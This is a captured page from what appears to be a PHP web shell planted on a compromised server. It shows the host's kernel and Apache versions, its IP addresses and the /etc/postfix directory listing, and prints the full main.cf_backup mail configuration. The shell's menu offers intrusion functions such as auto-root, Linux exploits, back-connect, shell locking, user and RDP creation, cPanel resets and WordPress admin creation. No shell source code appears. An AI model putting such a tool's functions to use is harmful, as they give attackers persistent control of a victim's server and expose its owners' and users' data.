Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
postfix /
[ HOME SHELL ]
Name
Size
Permission
Action
access
21.03
KB
-rw-r--r--
canonical
12.88
KB
-rw-r--r--
generic
9.98
KB
-rw-r--r--
header_checks
23.24
KB
-rw-r--r--
main.cf
3.73
KB
-rw-r--r--
main.cf_backup
3.6
KB
-rw-r--r--
master.cf
4.63
KB
-rw-r--r--
master.cf_backup
4.52
KB
-rw-r--r--
mynetworks
317
B
-rw-r--r--
mysql-relay_domains_maps.cf
144
B
-rw-r-----
mysql-virtual_alias_default_ma...
242
B
-rw-r-----
mysql-virtual_alias_maps.cf
159
B
-rw-r-----
mysql-virtual_alias_pipe_maps....
150
B
-rw-r-----
mysql-virtual_domains_maps.cf
161
B
-rw-r-----
mysql-virtual_mailbox_gid_maps...
143
B
-rw-r-----
mysql-virtual_mailbox_limit_ma...
144
B
-rw-r-----
mysql-virtual_mailbox_maps.cf
146
B
-rw-r-----
mysql-virtual_mailbox_uid_maps...
143
B
-rw-r-----
mysql-virtual_vacation.cf
212
B
-rw-r-----
postfix-files
0
B
-rw-r--r--
relocated
6.77
KB
-rw-r--r--
sender_blacklist
153
B
-rw-r--r--
sender_blacklist.db
12
KB
-rw-r--r--
sender_whitelist
137
B
-rw-r--r--
sender_whitelist.db
12
KB
-rw-r--r--
transport
45
B
-rw-r--r--
transport.db
12
KB
-rw-r--r--
vacation.conf
135
B
-rw-r--r--
vacation.php
2.54
KB
-rwxr-xr-x
vacation.pl
23.64
KB
-rw-r--r--
vacation.zip
2.34
KB
-rw-r--r--
vacation_class.php
4.6
KB
-rw-r--r--
virtual
13.64
KB
-rw-r--r--
virtual_regexp
0
B
-rw-r--r--
vmail_ssl.map
990
B
-rw-r--r--
vmail_ssl.map.db
60
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.cf_backup
# postfix config file # uncomment for debugging if needed #soft_bounce=yes # postfix main mail_owner = postfix setgid_group = postdrop delay_warning_time = 4 smtp_address_preference = ipv4 # postfix paths html_directory = no command_directory = /usr/sbin daemon_directory = /usr/libexec/postfix queue_directory = /var/spool/postfix sendmail_path = /usr/sbin/sendmail.postfix newaliases_path = /usr/bin/newaliases.postfix mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man # network settings inet_interfaces = all mydomain = yourdomain.com myhostname = MY_HOSTNAME mynetworks = $config_directory/mynetworks mydestination = $myhostname, localhost.$mydomain, localhost relay_domains = proxy:mysql:/etc/postfix/mysql-relay_domains_maps.cf # mail delivery recipient_delimiter = + # mappings alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases transport_maps = hash:/etc/postfix/transport #local_recipient_maps = # virtual setup virtual_alias_maps = proxy:mysql:/etc/postfix/mysql-virtual_alias_default_maps.cf, proxy:mysql:/etc/postfix/mysql-virtual_alias_maps.cf, regexp:/etc/postfix/virtual_regexp virtual_mailbox_base = /var/vmail virtual_mailbox_domains = proxy:mysql:/etc/postfix/mysql-virtual_domains_maps.cf virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql-virtual_mailbox_maps.cf, proxy:mysql:/etc/postfix/mysql-virtual_alias_pipe_maps.cf virtual_minimum_uid = 101 #virtual_uid_maps = static:101 #virtual_gid_maps = static:12 #virtual_transport = dovecot virtual_uid_maps = proxy:mysql:/etc/postfix/mysql-virtual_mailbox_uid_maps.cf virtual_gid_maps = proxy:mysql:/etc/postfix/mysql-virtual_mailbox_gid_maps.cf virtual_transport = lmtp:unix:private/dovecot-lmtp dovecot_destination_recipient_limit = 1 # debugging debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin xxgdb $daemon_directory/$process_name $process_id & sleep 5 # authentication smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous smtpd_sasl_local_domain = $myhostname broken_sasl_auth_clients = yes smtpd_sasl_type = dovecot smtpd_sasl_path = private/auth # tls config smtp_use_tls = yes smtpd_use_tls = yes smtpd_tls_security_level = may smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev:/dev/urandom smtp_tls_session_cache_database = btree:$data_directory/smtp_tls_session_cache # Change mail.example.com.* to your host name smtpd_tls_key_file = /etc/pki/tls/private/MY_DOMAIN.key smtpd_tls_cert_file = /etc/pki/tls/certs/MY_DOMAIN.crt smtpd_tls_CAfile = /etc/pki/tls/certs/ca-bundle.crt smtp_tls_CAfile = /etc/pki/tls/certs/ca-bundle.crt # rules restrictions smtpd_client_restrictions = reject_unknown_client smtpd_helo_restrictions = smtpd_sender_restrictions = check_sender_access hash:/etc/postfix/sender_whitelist, check_sender_access hash:/etc/postfix/sender_blacklist smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_recipient_domain, reject_rbl_client zen.spamhaus.org, reject_rbl_client bl.spamcop.net smtpd_helo_required = yes unknown_local_recipient_reject_code = 550 disable_vrfy_command = yes smtpd_data_restrictions = reject_unauth_pipelining # Other options # email size limit ~20Meg message_size_limit = 204800000 mailbox_size_limit = 2048000000 # Limit 500 emails per hour per email address anvil_rate_time_unit = 3600s smtpd_client_message_rate_limit = 500 # Vacation Scripts vacation_destination_recipient_limit = 1 recipient_bcc_maps = proxy:mysql:/etc/postfix/mysql-virtual_vacation.cf
Close